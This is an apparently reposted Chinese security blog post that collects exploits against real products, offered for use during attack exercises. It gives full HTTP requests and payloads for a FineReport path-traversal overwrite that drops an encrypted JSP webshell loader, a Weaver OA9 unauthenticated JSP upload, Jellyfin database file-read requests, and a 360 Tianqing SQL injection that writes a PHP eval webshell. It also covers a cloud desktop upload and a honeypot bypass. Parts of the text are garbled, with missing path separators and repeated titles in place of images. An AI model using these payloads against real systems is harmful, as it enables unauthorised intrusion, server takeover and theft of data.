HVV情报第一发

admin 2021年4月8日15:22:24评论290 views字数 2323阅读7分44秒阅读模式

点击蓝字 ·  关注我们

01

某软 V9getshell

FineReport V9  这个漏洞任意文件覆盖,上传 JSP 马,需要覆盖已经存在的JSP

POST  /WebReport/ReportServer?  op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update  .jsp  HTTP/1.1Host:  xx:8080User-Agent:  Mozilla/5.0  (Windows  aConnection:  closeAccept-Au:  xContent-Type:  text/xml;charset=UTF-8Content-Length:  675  {"__CONTENT__":"<%@page  import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class  U  extends  ClassLoader{U(ClassLoader  c){super(c);}public  Class  g(byte  []b){return  super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null)  {String  k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher  c=Cipher.getInstance("AES");c.init(2,new  SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new  U(this.getClass().getClassLoader()).g(c.doFinal(new  sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta  nce().equals(pageContext);%>","__CHARSET__":"UTF-8"}

HVV情报第一发

02

默安蜜罐存在未授权问

HVV情报第一发


Search


HVV情报第一发


1.


HVV情报第一发


2.Burpsuite抓包


HVV情报第一发


Drop 


HVV情报第一发




HVV情报第一发


 drop


HVV情报第一发


跳到页面


HVV情报第一发



HVV情报第一发


ping

HVV情报第一发

HVV情报第一发

HVV情报第一发

HVV情报第一发




HVV情报第一发

03

泛微OA9前台getshell

漏洞位于:/page/exportImport/uploadOperation.jsp文件中


直接文件上传

HVV情报第一发


利用非常简单,只要对着

multipartRequest 上传即可


HVV情报第一发

然后请求路径:

/page/exportImport/fileTransfer/xxx.jsp


HVV情报第一发

04

Jellyfin任意文件读取

GET /Audio/anything/hls/..datajellyfin.db/stream.mp3/ HTTP/1.1GET /Videos/anything/hls/m/..datajellyfin.db HTTP/1.1GET /Videos/anything/hls/..datajellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1


05

天擎-前台sql注入

 getshell:

https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:Program Files (x86)360skylar6www1.php';drop table O;-- 

利用过程:
root 写shell

06

和信创天云桌面命令执行


POST /Upload/upload_file.php?l=1 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Referer: x.x.x.xAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,fil;q=0.8Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGvContent-Length: 164------WebKitFormBoundaryfcKRltGvContent-Disposition: form-data; name="file"; filename="1.png"Content-Type: image/avif1------WebKitFormBoundaryfcKRltGv--

EDI安全

HVV情报第一发

扫二维码|关注我们

一个专注渗透实战经验分享的公众号



本文始发于微信公众号(EDI安全):HVV情报第一发

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月8日15:22:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HVV情报第一发http://cn-sec.com/archives/329307.html

发表评论

匿名网友 填写信息